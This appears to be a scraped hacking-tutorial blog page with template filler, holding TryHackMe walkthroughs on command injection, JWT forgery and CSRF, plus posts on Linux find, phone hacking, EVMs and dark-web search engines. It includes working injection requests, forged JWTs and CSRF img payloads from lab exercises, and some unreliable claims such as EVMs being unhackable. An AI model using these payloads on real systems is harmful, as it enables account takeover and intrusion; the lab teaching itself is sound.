-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • What is a thing which cannot be hacked?

      

    What is a thing which cannot be hacked? by hackingtruth.in or kumaratuljaiswal.in


    which cannot be hacked


     

    "In simple words, All things that are not connected to the internet cannot be hacked. "


    otherwise, Yes, there are many very small systems that cannot be hacked.

    Hacking a system is like robbing a bank. If the bank is a 1 inch by 1 inch solid steel box, and is kept inside my pocket, it really can’t be hacked.

    The larger the system, the more possibilities for it to have a flaw/vulnerability that can be exploited, resulting in a hack.

    However, today computer and digital systems are very complex. Even if you have a perfect cryptographic system (e.g. AES) or even if you have a theoretically proven flawless algorithm (Google NaCl), then you still have to run these pieces of code on an operating system and a sizable hardware, both of which are susceptible to attacks. What is a thing which cannot be hacked?



    For example, did you know that all cryptography can become futile, if you can measure the power usage of the hardware? Because then you can tell how exactly is the algorithm running, and extract the secrets from it. These attacks are called side-channel attacks.




     

    EVM Voting In India

     

    EVM(Electronic Voting Machines) which are used many country to contest their elections. Even in India EVMs are used to contest the election. The EVMs can't be hacked as they aren't connected to any other devices or network. No internet, no Bluetooth, nothing. Many a times many political parties have questioned the authenticity of the EVM but none of them were present when the election commission of India called them to hack the EVM. Any device can only be hacked if it's connected to any network or to some other device. instashell



    Electronic Voting is the standard means of conducting elections using Electronic Voting Machines, sometimes called "EVMs" in India.[1][2] The use of EVMs and electronic voting was developed and tested by the state-owned Electronics Corporation of India and Bharat Electronics in the 1990s. They were introduced in Indian elections between 1998 and 2001, in a phased manner. The electronic voting machines have been used in all general and state assembly elections of India since 2004.



    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     


  • My phone was hacked by some so what can I do


    My phone was hacked by some so what can I do

     

     

    Hacked by someone

     

    We live in the 21st century where the idea of being hacked is the no. 1 fear among p.c and phone users. The introduction with wireless technology and the rapid expansion and availability of internet to a wider audience also means more prey for the predators who use the web as hunting grounds. My phone was hacked by some so what can I do
     

     

    Signs Someone Is Hacking Your Phone



    • Unknown Apps: A hacked phone will often have unfamiliar apps running in the background. These are special hacker apps not available in the official app store.


    • Constant Low Battery: Hacking a phone will quickly run the battery down. A constant dead battery is a sign something could be wrong.

     

    • Hot, Hot, Hot: Does your phone feel hot even if you haven’t been using it? That could be an indicator you’ve been hacked. Extra activity will cause any device to heat up.


    • Strange Charges: Are there charges on your phone bill that you don’t understand? Hackers tracking you with GPS will cause roaming and data charges to go much higher.


    • Nonsensical Text Messages: Hacked phones will often receive texts in code or that are otherwise indecipherable. It happens when the phone’s message system picks up the coded messages delivered from the hacker.

     

    • PopUps : Another sign might be the increase in pop-ups you don’t remember agreeing to, for e.g medicines,new phones, software etc.

     

     


     

     

     

    What To Do If Your Phone Is Hacked



    Delete Unknown Apps

    If you can’t remember downloading it and don’t know what purpose it serves, it’s best to be safe and delete it. You’ll notice these apps running in the background despite you never having seen or interacted with them before.



    Use Antivirus Software

    There are plenty of good antivirus programs designed for all operating systems. Utilizing this kind of software shields you from possible outside attacks. There are free versions available, but superior protection will come with a price tag.



    Keep Your Phone Updated


    Regular updates will keep the phone’s defenses up. You want your security system as up to date as possible. It may seem like an inconvenience, but ignoring that upgrade could cost you in the long run. Take a half hour or so and upgrade your cell phone.


    Check Your Phone Bill

    You’ll notice a higher monthly bill than normal if your phone gets hacked. The excess activity will likely raise your data charges. Go through your monthly statement with a fine tooth comb. Getting in touch with your service provider can prevent it from costing you financially.



    Factory Reset

    This should be a last resort. A factory reset will clear ALL your data from the phone and restore it to its original, default settings. Your pictures, settings, and everything else will be erased. In this case, any hacking program will be removed from the phone along with all your files.




    Ways To Prevent Future Hacking


    • Being proactive now will prevent future attacks from happening to you. Here are some ways in which to protect yourself.



    • Turn Off Bluetooth When Not In Use: Bluetooth is a common way for hackers to access target phones. There was a hack scare known as Blueborne in 2017 where this very thing was happening.


    • Be Wary Of Public Wi-Fi: Wi-Fi connections makes everything run a little faster. However, it might be worth using your own data to keep cybercriminals at bay.


    • Keep Your Phone Upgraded: Staying upgraded means your phone has the best defense available for your operating system.

     

    • Only Use Official Apps: Only purchase apps from the official app store. Outside apps are risky and tend to cause problems.


    • Create Strong Passwords: Come up with something clever, or better yet, something nonsensical that nobody will guess. Don’t use common information about yourself like name, address, or anything somebody might be able to guess.




    if you found this helpful please you should not forget to share this post!!!!!!!!

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     


  • Find command in linux to search a file and directories

     


     

    Find command in linux

     

    To be precise, the ‘find’ command is used to search for files in a directory hierarchy, and as the necessary explanation is available there, we will look at the tasks.


    When you know exactly what you’re looking for, you don’t need to search for it; you just have to find it. Find command in linux to search a file and directories


    This tutorial will help you understand how to use the find command effectively in a CTF context. It is written in a way that you won’t have to refer to the man page to complete it, although I recommend the man page for further reading.


    The syntax of the command can be broken down as such:

     find where what 


    Firstly you tell the system to f🤟🏻ind something; secondly you tell it where to look; and finally, you tell it what to look for.

    You don’t need to specify when you’re looking in your working directory. Also, you can use wildcards as well, in specifying both a directory and a name.


    Note: There's no VM to deploy in this room. You only need to enter the commands that would be used to find what the questions ask for. You can also test the commands on your own terminal (if you have access to a Unix or Unix-like system) to check the output of find with different options. However, that's not necessary; this is a walkthrough, and everything you need to solve this room is in the tasks' description.find command in linux to search a string


    On your terminal, execute the command:

    touch file-1 file-2

    This command will create two files, named file-1 and file-2 respectively, in your current working directory.


    Now, execute:

    find file*

    As you can see, the command outputs both of your files.


    This time, execute:

    find *1

    Only file-1 is in the output.



    Be More Specific

     

    Most of the time, you won’t be looking for something in your working directory. The first argument of your find command should be the directory you want to search. The command will search in that directory and in all its subdirectories. So, if you want to search the whole filesystem, your command should begin with find /. find command in amazon linux


    Two very useful flags are the -type and -name flags. With -type, you can use d to only find directories, and f to only find files. The -name flag is used to specify a name or pattern to look for. You can type the whole name, or use wildcards to specify only part(s) of the name. If you use wildcards, you need to enclose your pattern in quotes, otherwise the command won't work as intended. It is useful to know that you can also use the -iname flag; same as -name, but case insensitive.

    These commands are useful when you want to specify only part of the name of what you’re looking for. find command in linux with example
     

     

    🤟🏻

    #1 Find all files whose name ends with “.xml”

    Ans: find / -type f -name “*.xml”

    #2 Find all files in the /home directory (recursive) whose name is “user.txt”

    Ans: find /home -type f -iname user.txt

    #3 Find all directories whose name contains the word “exploits”

    Ans: find / -type d -name “*exploits*”

     

     

    Know exactly what you're looking for


    In some situations, specifying just the name of a file will not be enough. You can also specify the owner, the size, the permissions, and the time the file was last accessed/modified as well.


    The username of the owner of a file is specified with the -user flag.


    The size of a file is specified with the -size flag. When using numerical values, the formats -n, +n, and n can be used, where n is a number. -n matches values lesser than n, +n matches values greater than🤟🏻 n, and n matches values exactly n. To specify a size, you also need a suffix. c is the suffix for bytes, k for KiB’s, and M for MiB’s. So, if you want to specify a size less than 30 bytes, the argument -30c should be used. find command in linux centos 7


    The -perm flag is used to specify permissions, either in octal form (ex. 644) or in symbolic form (ex. u=r). See here for a short reference. If you specify the permission mode as shown above (ex. 644 or u=r), then find will only return files with those permissions exactly. You can use the – or / prefix to make your search more inclusive. Using the – prefix will return files with at least the permissions you specify; this means that the -444 mode will match files that are readable by everyone, even if someone also has write and/or execute permissions. Using the / prefix will return files that match any of the permissions you have set; this means that the /666 mode will match files that are readable and writeable by at least one of the groups (owner, group, or others). find command in linux to find a file


    Lastly, time-related searches will be covered. These are more complex but may prove useful. The flag consists of a word and a prefix. The words are min and time, for minutes and days, respectively. The prefixes are a, m, and c, and are used to specify when a file was last accessed, modified, or had its status changed. As for the numerical values, the same rules of the -size flag apply, except there is no suffix. To put it all together: in order to specify that a file was last accessed more than 30 minutes ago, the option -amin +30 is used. To specify that it was modified less than 7 days ago, the option -mtime -7 is used. (Note: when you want to specify that a file was modified within the last 24 hours, the option -mtime 0 is used.) linux in find command
     

     
    #1 Find all files owned by the user "kittycat"

    Ans: find / -type f -user kittycat


    #2 Find all files that are exactly 150 bytes in size

    Ans: find / -type f -size 150c


    #3 Find all files in the /home directory (recursive) with size less than 2 KiB’s and extension ".txt"


    Ans: find /home -type f -size -2k -name "*.txt"

     

    #4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format)


    Ans: find / -type f -perm 644


    #5 Find all files that are only readable by anyone (use octal format)

    Ans: find / -type f -perm /444


    #6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)

    Ans: find / -type f -perm -o=w -name "*.sh"


    #7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)



    Ans: find /usr/bin -type f -user root -perm -u=s

    #8 Find all files that were not accessed in the last 10 days with extension ".png"


    Ans: find / -type f -atime +10 -name "*.png"

    #9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours

    Ans: find /usr/bin -type f -mmin -120


     

    To conclude this tutorial, there are two more things that you should know of. The first is that you can use the redirection operator > with the find command. You can save the results of the search to a file, and more importantly, you can suppress the output of any possible errors to make the output more readable. This is done by appending 2> /dev/null to your command. This way, you won’t see any results you’re not allowed to access.


    The second thing is the -exec flag. You can use it in your find command to execute a new command, following the -exec flag, like so: -exec whoami \;. The possibilities enabled by this option are beyond the scope of this tutorial, but most notably it can be used for privilege escalation.
     

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

  • TryHackMe advent of cyber command injection walkthrough

     

    command injection

     

     

    Depending on the functionality of the web application, it will require some sort of interaction with the underlying host system this is usually done by passing in raw system commands or input to a command shell(either directly or through some sort of library).  TryHackMe advent of cyber command injection walkthrough

    Examples of when web applications interact with host systems involve:


    Checking monitoring statistics e.g. RAM being used, free disk space File conversion processes e.g. the web application would receive an image file that it wants to convert to a different image type Leaving debug functionality open; some frameworks have optional debug functionality that involve interaction with the underlying file system


    Any input that is controlled by a user shouldn’t be trusted by the server. User input could be manipulated. In the case of when a web application uses system commands, a user could manipulate input to execute arbitrary system commands. This type of an attack is called a command injection attack.



    Command Injection


    If a web application takes input supplied by a user and makes it part of a command that is used within a shell, it allows an adversary to inject arbitrary operating system commands.


    Instructions


    • Another day, another hack from the Christmas Monster. Can you get back control of the system?
    • Access the web server on http://[your-ip]:3000/
    • McSkidy actually found something interesting on the /api/cmd endpoint.



    In Browser ( using command injection )




     

    After trying a few injections, methods, I found that the following request was returning something interesting:


    In Terminal


    $ curl -s http://10.10.15.73:3000/api/cmd/ls 

    {"stdout":"bin\nboot\ndata\ndev\netc\nhome\nlib\nlib64\nlocal\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n","stderr":""}




    Following the logic, I was able to locate the home directory, and found the user.txt file:



    $ curl -s http://10.10.15.73:3000/api/cmd/ls%20%2Fhome
    {"stdout":"bestadmin\nec2-user\n","stderr":""}


     

    $ curl -s http://10.10.15.73:3000/api/cmd/ls%20%2Fhome%2Fbestadmin
    {"stdout":"bin\nnew-room\nrun.sh\nuser.txt\n","stderr":""}


     

    I then changed from ls to cat to show the content of the flag:

     

    $ curl -s http://10.10.15.73:3000/api/cmd/cat%20%2Fhome%2Fbestadmin%2Fuser.txt
    {"stdout":"5W7WkjxBWwhe3RNsWJ3Q\n","stderr":""}


     

     

    Answer: 5W7WkjxBWwhe3RNsWJ3Q

     

     


    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

     

  • Top 3 Scarest darkweb search engine




     

    The search engine seems to be being run in a very businesslike way too. There's a CAPTCHA feature to help keep it secure and since its introduction it has implemented a number of updates and added new features and services. The search algorithm has been updated to allow for faster searches, and the advertising system has been changed to allow users to bid on listings directly. It includes its own beta Bitcoin mixer to anonymize transactions too. Top 3 Scarest darkweb search engine





    1. Torch



    website url: xmh57jrzrnw6insl

    Torch is one of the most popular and most applauded deep web search engines in existence. The sheer fact that the search engine has been live since 1996 establishes its potential, the dark forces of the internet do not let anything live anything this long without quality.

    It’s also extremely simple, there’s the logo, and the search bar. Although yes, it does display ads even though they’re not based on your cookies or caches, and are rather static ads which are the same for everyone.

    It also claims to have over 1million pages indexed in its database, which I suppose is enough for most of us. instashell







    2. The Dark Lair


    Darkweb website - The Dark Lair

    Link: http://vrimutd6so6a565x.onion/index.php/Board

    The Dark Lair was initially an image hosting platform and evolved into a social network over time. You can share images, post comments, and engage with other users as both a registered as well as anonymous user.







    3. Darkweb website - Duck Duck Go


    Link: http://3g2upl4pq6kufc4m.onion/

    Do you want to search for something privately? Then, DuckDuckGo is one of the best alternatives to Google. Your search activity isn’t stored, and you get decent answers for most queries without all the tracking. The search engine is also available on the dark web and offers an additional layer of anonymity and privacy with fast search results.

     




     

    Bonus 

    Dark Web Links

    Click Here :- Dark web


     

    hackingtruth.in does not promote or endorse claims that have been made by any parties in this article. The information provided here is for the general purpose only and unintended to promote or support purchasing and or selling of any products and services or serve as a recommendation in the involvement of doing so. Neither KumarAtulJaiswal ( hackingtruth.in ) nor any member is responsible directly or indirectly for any loss or damage caused or alleged to be caused by or in relation with the reliance on or usage of any content, goods or services mentioned in this Article/Video.

     

  • TryHackMe JWT Json Web Tokens

     


     

     

    Json Web Token's are a fairly interesting case, as it isn't a vulnerability itself. Infact, it's a fairly popular, and if done right very secure method of authentication. The basic structure of a JWT is this, it goes "header.payload.secret", the secret is only known to the server, and is used to make sure that data wasn't changed along the way. Everything is then base64 encoded.  TryHackMe JWT Json Web Tokens



    so an example JWT token would look like 

    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm

    FtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fw

    pMeJf36POk6yJV_adQssw5c"


    Meaning that if we are able to control the secret, we can effectively control the data. To be able to do this we have to understand how the secret is calculated. This requires knowing the structure of the header, a typical JWT header looks like this {"typ":"JWT","alg":"RS256"}. We're interested in the alg field. RS256 uses a private RSA key that's only available to the server, so that's not vulnerable. However, We can change that field to HS256, This is calculated using the server's public key, which in certain circumstances we may have access too. instashell


    Manual JWT Exploitation

    We start off with a basic application




    With a JWT, and a JWT verifier. Sending it garbage results in a failure, so let's try decoding the JWT.






    Decoding the JWT gives us our header, payload, and a bunch of garbage which is the secret. instashell github
     





    Unfortunately it seems the algorithm is RS256, which doesn't have any vulnerabilities. Fortunately for us though, this server leaves its public key lying around, which means we can change the algorithm and sign a new secret! The first step is to change the algorithm in the header to HS256, and then re encode it in base64.  hacking truth

     

    Our new JWT is eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0

    IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsb

    G8iOiJ3b3JsZCJ9fQ.FXj9F1jIXlhMyoQAo5-XPOiZeP4Ltw5XXZGqgX49tKkYUOeirOXUDgWL4bqP9nRXIODqOByqS_9O11nQ

    N5bC_LTpfBWG2WZXg0tKIDAbKTxVkrytXBmOkP1qRK_Apv-CQs-mouuS1we8SHYShW_r4DEj0qAF3dsWVVzbRWNMH4Oc_odHNogv00dVlABcxMy

    XFpNJbeRS6-GCS-A4SFM32gMv_mkfkXrQPdejKDU_sKZrD5VVAmDlu0BainIvD28l8uV3OCc37shtPW

    0TKoIwUXmGsFYouKqk-h0dz4aTBLKJk7L64XdrA7ts1oOtzk8KqV6gnqXDXUNkzDX3qd9JKA


    The next step is to convert the public key to hex so openssl will use it.





    (Explanation: a is the file with the public key, xxd -p turns the contents of a file to hex, and tr is there to get rid of any newlines)

    The next step is to use openssl to sign that as a valid HS256 key.




    Everything is going just fine so far!. The final step is to decode that hex to binary data, and reencode it in base64, luckily python makes this really easy for us.




    That's our final secret, now we just put that where the secret should go, and the server should accept it.

    So our final JWT would beeyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.<payload>.<new secret>




    Automatic JWT exploitation


    Due to the fact that JWT tokens often expire, there's no real way to guarantee that finding the public key is possible, and that there is no way to keep the data portion of the JWT consistent, there aren't tools avaliable that automatically exploit JWT vulnerabilities. JWT vulns have to be exploited on a case by case basis.

    Now that doesn't mean you can't write a script that does everything automatically for a specific website that you know is vulnerable, it's just that by the time you succeed in doing that, you could have already exploited the vulnerability.


    Challenge!


    The challenge is effectively the exact same application shown in the Manual exploitation section. If you succeed in exploiting it, you will get the flag!

    The public key can be found at /public.pem.

    Generated JWT tokens will also expire after a certain amount of time, so if you don't get it the first try, try doing it faster!

    Note: some recommended reading here :-  Click Here



    Intro


    In addition to the previous vulnerability, certain JWT libraries have another devastating vulnerability. There is actually three possible algorithms, two of them RS256 and HS256 which we have already studied. There is a third algorithm, known as None. According to the official JWT RFC the None algorithm is used when you still want to use JWT, however there is other security in place to stop people from spoofing data.


    RFC :- Click Here


     



    Unfortunately certain JWT libraries clearly didn't read the RFC, allowing a vulnerability where an attacker can switch to the None algorithm, in the same way one switches to RS256 to HS255, and have the token be completely valid without even needing to calculate a secret.


    #1 Remember to read the RFC when your developing a library.


    Manually exploitating the JWT None vuln

    We start off with a simple login application.




    Logging in gives us a user screen, as well as a JWT token.




    Let's examine that token in the wonderful site jwt.io





    (Very nice site btw, definitely recommend for all your jwt needs)

    Now let's try changing the alg field to none, get rid of the signature, and change the role to admin. That leaves us with this final jwt token. eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNTg1MzQ1ODg0MjA0LCJhZ2

    VudCI6Ik1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NDsgcnY6NjguMCkgR2V

    ja28vMjAxMDAxMDEgRmlyZWZveC82OC4wIiwicm9sZSI6ImFkbWluIiwiaWF0Ijox

    NT

    g1MzQ1ODg0fQ.

    The interesting this is we still need is a second . to denote that a signature would be there, even though we don't put anything after it. Let's try popping that token in where the cookie is supposed to be.the linux choice shellphish




    Automatic Exploitation


    There is no tool that can check the library, get the token, and make sure this is vulnerable. Therefore, you're gonna have to do this manually. The header for each JWT none vuln though is the same, which can help you out. Here's the header

    eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

    Which decodes to {"type": "JWT", "alg": "none"}


    #1 What is the flag?


    JWT once again


    Recall that JWT HS256 is calculated using a secret.The exact format of the calculation is

    HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)

    Therefore, it stands to reason that, since we have the full jwt token, and the header and payload, the secret can be brute forced to obtain the full JWT token. If the secret can be brute forced then the attacker could sign his own JWT tokens.


    Bruteforcing JWT tokens.


    To brute force these secrets we'll be using a tool called jwt-cracker. The syntax of jwt-cracker isjwt-cracker <token> [alphabet] [max-length] where alphabet and max-length are optional parameters.


     

    Explanation of Paramaters:


    Token: The HS256 JWT token


    Alphabet: The alphabet that the cracker will use to check passwords(default: "abcdefghijklmnopqrstuvwxyz")
     

     

    max-length
       

    The max expected length of the secret(12 by default)

    Using an example token from jwt.io lets see how long it takes to crack.




    In 4 seconds, we've tried 300000 passwords and cracked the secret!




    [Bonus Section]: Challenge


    Given the following token
    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm

    FtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE

     

    What is the secret?

    Ans :- Please mention in comment below






    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • TryHackMe CSRF walkthrough






    [CSRF]: What is CSRF



    Cross Site Request Forgery, known as CSRF occurs when a user visits a page on a site, that performs an action on a different site. For instance, let's say a user clicks a link to a website created by a hacker, on the website would be an html tag such as <img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">  which would change the account email on the vulnerable website to "pwned@evil-user.net".  CSRF works because it's the victim making the request not the site, so all the site sees is a normal user making a normal request. TryHackMe CSRF walkthrough



    This opens the door, to the user's account being fully compromised through the use of a password reset for example. The severity of this cannot be overstated, as it allows an attacker to potentially gain personal information about a user, such as credit card details in an extreme case.




    [CSRF]: Manual exploitation of CSRF



    Let's take an example application








    It seems simple enough, As user bob, I can send funds to either Bob or Alice with any of the available balance in my account. Let's take a closer look at the request in burp.












    This is looking good, parameters we can customize and a session cookie that is automatically set. Everything seems vulnerable to CSRF. Let's try and make a vulnerable site. Putting <img src="http://localhost:3000/transfer?to=alice&amount=100"> into an html file and using SimpleHTTPServer to host it should change's Alice's balance by 100, Let's see if it does!


    Woohoo, CSRF exploited!







     

    [CSRF]: Automatic Explotation



    Once again, there is a nice automated scanner, which tests if a site is vulnerable to CSRF. this tool is known as xsrfprobe and can be install via pip using pip3 install xsrfprobe. This will only work using python 3(I mean come on it's 2020 you should be using python 3 anyway).

     



    The syntax for the command is xsrfprobe -u <url>/<endpoint>. Let's run this against our vulnerable site.








    The output confirms that we've managed to manually exploiting it and that the site is vulnerable to csrf.


    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)




  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.